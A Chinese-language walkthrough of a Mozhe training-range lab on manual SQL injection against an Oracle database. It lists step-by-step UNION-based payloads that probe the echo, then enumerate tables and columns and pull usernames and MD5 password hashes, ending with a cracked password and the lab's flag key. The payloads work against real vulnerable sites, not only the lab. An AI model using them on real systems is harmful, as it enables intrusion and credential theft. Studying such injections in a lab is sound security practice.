参考:https://www.cnblogs.com/peterpan0707007/p/8242119.html 墨者靶场:SQL手工注入漏洞测试(Oracle数据库) 注入点位置:数据库登陆页面下的那个展示公告的地方,点进去会出现类似于公告的展示页面 测回显: " dual " 并不是一个特定的数据库或数据表,它实际上是 Oracle 数据库系统中的一种虚拟表。 在 Oracle 数据库中,dual 表是一个特殊的只读表,通常用于执行一些简单的测试或计算。人称凑数表。 and1=2 union select '1','2'from dual 爆库: select table_name from user_tables:从user_tables表取出table_name列的值 rownum=1 :限制结果集只返回前一行 and1=2 union select '1',(select table_name from user_tables where rownum=1) from dual 模糊爆库: like '%user%':模糊查询存在'user'字段的值。 and1=2 union select '1',(select table_name from user_tables where rownum=1and table_name like '%user%') from dual 爆列名: 找出'sns_users'表的列名值 => user_name and1=2 union select '1',(select column_name from all_tab_columns where rownum=1and table_name='sns_users') from dual 爆其他列名: 使用排除法爆破其它列名:column_name not in ('USER_NAME') => user_pwd and1=2 union select '1',(select column_name from all_tab_columns where rownum=1and table_name='sns_users'and column_name not in ('USER_NAME')) from dual 爆数据: and1=2 union select user_name,user_pwd from"sns_users" 爆出:hu 1c63129ae9db9g20asdua94d3e00495 爆其他数据: 用户名不是“hu”的数据:USER_NAME<>'hu' 可以通过这种方式不断筛选用户名数据 and1=2 union select user_name,user_pwd from"sns_users" where USER_NAME<>'hu' 爆出:mozhe 8b4353daf4ec0978f2f1114e13ce29bd ==md5解密=> 997528 成功登陆后的KEY:mozhe03f97d23df406288242ba951273